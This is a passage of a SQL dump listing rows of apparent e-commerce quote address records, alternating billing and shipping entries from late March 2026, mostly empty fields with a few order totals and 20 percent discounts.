(1248, 807, '2026-03-30 22:29:11', '2026-03-30 22:29:11', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1249, 808, '2026-03-31 00:14:14', '2026-03-31 00:14:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1250, 808, '2026-03-31 00:14:15', '2026-03-31 00:14:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1251, 809, '2026-03-31 06:01:47', '2026-03-31 06:01:47', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1252, 809, '2026-03-31 06:01:47', '2026-03-31 06:01:47', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1253, 810, '2026-03-31 06:06:12', '2026-03-31 06:06:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1254, 810, '2026-03-31 06:06:12', '2026-03-31 06:06:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1255, 811, '2026-03-31 12:05:30', '2026-03-31 12:05:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1256, 811, '2026-03-31 12:05:30', '2026-03-31 12:05:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1257, 812, '2026-03-31 16:03:46', '2026-03-31 16:03:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1258, 812, '2026-03-31 16:03:46', '2026-03-31 16:03:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1259, 813, '2026-03-31 18:10:12', '2026-03-31 18:10:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1260, 813, '2026-03-31 18:10:12', '2026-03-31 18:10:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1261, 814, '2026-03-31 18:28:31', '2026-03-31 18:28:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1262, 814, '2026-03-31 18:28:31', '2026-03-31 18:28:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1263, 815, '2026-03-31 18:28:37', '2026-03-31 18:28:37', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1264, 815, '2026-03-31 18:28:37', '2026-03-31 18:28:37', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1265, 816, '2026-03-31 18:28:38', '2026-03-31 18:28:38', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1266, 816, '2026-03-31 18:28:38', '2026-03-31 18:28:38', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1267, 817, '2026-03-31 18:28:40', '2026-03-31 18:28:40', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1268, 817, '2026-03-31 18:28:40', '2026-03-31 18:28:40', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1269, 818, '2026-03-31 18:28:41', '2026-03-31 18:28:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1270, 818, '2026-03-31 18:28:41', '2026-03-31 18:28:41', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1271, 819, '2026-03-31 18:28:43', '2026-03-31 18:28:43', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1272, 819, '2026-03-31 18:28:43', '2026-03-31 18:28:43', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1273, 820, '2026-03-31 18:28:44', '2026-03-31 18:28:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1274, 820, '2026-03-31 18:28:44', '2026-03-31 18:28:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1275, 821, '2026-03-31 18:28:46', '2026-03-31 18:28:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1276, 821, '2026-03-31 18:28:46', '2026-03-31 18:28:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1277, 822, '2026-03-31 18:28:48', '2026-03-31 18:28:48', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1278, 822, '2026-03-31 18:28:48', '2026-03-31 18:28:48', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1279, 823, '2026-03-31 18:28:49', '2026-03-31 18:28:49', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1280, 823, '2026-03-31 18:28:49', '2026-03-31 18:28:49', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1281, 824, '2026-03-31 18:28:51', '2026-03-31 18:28:51', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1282, 824, '2026-03-31 18:28:51', '2026-03-31 18:28:51', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1283, 825, '2026-03-31 18:28:53', '2026-03-31 18:28:53', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1284, 825, '2026-03-31 18:28:53', '2026-03-31 18:28:53', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1285, 826, '2026-03-31 18:28:54', '2026-03-31 18:28:54', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1286, 826, '2026-03-31 18:28:54', '2026-03-31 18:28:54', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1287, 827, '2026-03-31 18:29:03', '2026-03-31 18:29:03', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1288, 827, '2026-03-31 18:29:03', '2026-03-31 18:29:03', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1289, 828, '2026-03-31 18:29:08', '2026-03-31 18:29:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1290, 828, '2026-03-31 18:29:08', '2026-03-31 18:29:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1291, 829, '2026-03-31 18:29:13', '2026-03-31 18:29:13', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1292, 829, '2026-03-31 18:29:13', '2026-03-31 18:29:13', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1293, 830, '2026-03-31 18:29:19', '2026-03-31 18:29:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
